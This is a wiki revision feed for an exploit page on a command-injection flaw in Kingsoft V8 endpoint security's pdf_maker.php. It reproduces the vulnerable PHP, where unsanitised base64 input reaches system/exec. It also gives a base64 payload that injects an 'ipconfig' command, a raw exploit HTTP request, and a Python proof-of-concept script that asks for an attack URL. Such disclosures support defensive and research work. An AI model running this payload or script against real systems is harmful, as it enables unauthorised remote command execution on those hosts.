https://pwnwiki.com/index.php?action=history&feed=atom&title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
金山 V8 終端安全系統 pdf maker.php 命令執行漏洞 - Revision history
2026-04-07T20:21:28Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1850&oldid=prev
Pwnwiki: Created page with "==漏洞影響== 金山 V8 终端安全系统 ==漏洞復現== V8安裝包: <pre> http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso </pre> 存在漏洞的文件..."
2021-04-22T01:52:57Z
<p>Created page with "==漏洞影響== 金山 V8 终端安全系统 ==漏洞復現== V8安裝包: <pre> http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso </pre> 存在漏洞的文件..."</p>
<p><b>New page</b></p><div>==漏洞影響==<br />
金山 V8 终端安全系统<br />
<br />
==漏洞復現==<br />
V8安裝包:<br />
<pre><br />
http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso<br />
</pre><br />
存在漏洞的文件為<br />
<pre><br />
Kingsoft\Security Manager\SystemCenter\Console\inter\pdf_maker.php<br />
</pre><br />
<br />
<pre><br />
<?php<br />
require_once (dirname(__FILE__)."\\common\\HTTPrequest_SCpost.php");<br />
/*<br />
{<br />
"kptl" :<br />
{<br />
"set_exportpdf_cmd" :<br />
{<br />
"url" : "http://172.18.254.146/report/system/main.php?userSession=5784727B-7AEA-4EFE-B0CB-DDD6DA1CABD3&guid=1AC380D9- 580C-49A8-B6EC-787CF50FA928&VHierarchyID=ADMIN",<br />
"fileName":"test.pdf"<br />
}<br />
}<br />
*/<br />
<br />
<br />
//$post = file_get_contents("php://input");<br />
<br />
/*<br />
$post = array("kptl"=><br />
array("set_exportpdf_cmd"=>array(<br />
"url"=>"http://172.18.254.146/report/system/main.php?userSession=5784727B-7AEA-4EFE-B0CB-DDD6DA1CABD3&guid=1AC380D9-580C-49A8-B6EC-787CF50FA928&VHierarchyID=ADMIN",<br />
"fileName"=>"test1234.pdf"<br />
)<br />
));<br />
*/<br />
<br />
<br />
<br />
<br />
<br />
<br />
$url = $_POST["url"];<br />
$fileName = $_POST["fileName"];<br />
$batName=$fileName;<br />
if ($url == null || $fileName == null)<br />
{<br />
$return["nResult"] = __LINE__;<br />
echo json_encode($return,JSON_UNESCAPED_UNICODE);<br />
return ;<br />
}<br />
<br />
$url = base64_decode($url);<br />
$nameStr = base64_decode($fileName).date("Y-m-d").".pdf";<br />
$fileName="..\\htmltopdf\\".$nameStr;<br />
<br />
system('mkdir ..\\htmltopdf');<br />
<br />
<br />
$cmd = '..\\..\\wkhtmltopdf.exe "'.$url.'" '.$fileName;<br />
if (getApacheVersion()>=24) { //apache 2.4 php 7 版本 只能在 bat中运行<br />
$cmd =" del ".$fileName;<br />
<br />
exec($cmd);<br />
$url_= str_replace('%','%%', $url);<br />
$cmd = '..\\..\\wkhtmltopdf.exe "'.$url_.'" '.$fileName;<br />
$batName ="exec_wkhtmltopdf.bat";<br />
$myfile = fopen($batName , "w");<br />
//$cmd =iconv("UTF-8", "gbk", $cmd );<br />
fwrite($myfile, $cmd);<br />
fclose($myfile);<br />
$cmd =$batName ;<br />
exec($cmd);<br />
$cmd =" del ".$batName;<br />
exec($cmd);<br />
}else<br />
{<br />
system($cmd);<br />
}<br />
// echo $url;<br />
$return = array("nResult" => "0","fileName" =>$nameStr,"url"=>$url);<br />
echo json_encode($return,JSON_UNESCAPED_UNICODE);<br />
<br />
?><br />
</pre><br />
這裏传入base64加密的拼接命令即可执行任意命令<br />
<pre><br />
"|| ipconfig || --base64--> url=IiB8fCBpcGNvbmZpZyB8fA==&fileName=xxx<br />
</pre><br />
<br />
<pre><br />
<br />
POST /inter/pdf_maker.php HTTP/1.1<br />
Host: xxx.xxx.xxx.xxx<br />
Content-Length: 45<br />
Pragma: no-cache<br />
Cache-Control: no-cache<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer:<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6<br />
Cookie: PHPSESSID=noei1ghcv9rqgp58jf79991n04<br />
<br />
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import random<br />
import re<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mTitle : 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/inter/pdf_maker.php"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Content-Type": "application/x-www-form-urlencoded"<br />
}<br />
data = "url=IiB8fCBpcGNvbmZpZyB8fA==&fileName=xxx"<br />
try:<br />
response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)<br />
if "Windows" in response.text and response.status_code == 200:<br />
print("\033[32m[o] 目标 {} 存在漏洞 ,执行 ipconfig, 响应为:\n{} \033[0m".format(target_url, response.text))<br />
else:<br />
print("\033[31m[x] 不存在漏洞 \033[0m")<br />
sys.exit(0)<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
==參考==<br />
https://mp.weixin.qq.com/s/zaNvtagdCTx9XtGeotWoYw</div>
Pwnwiki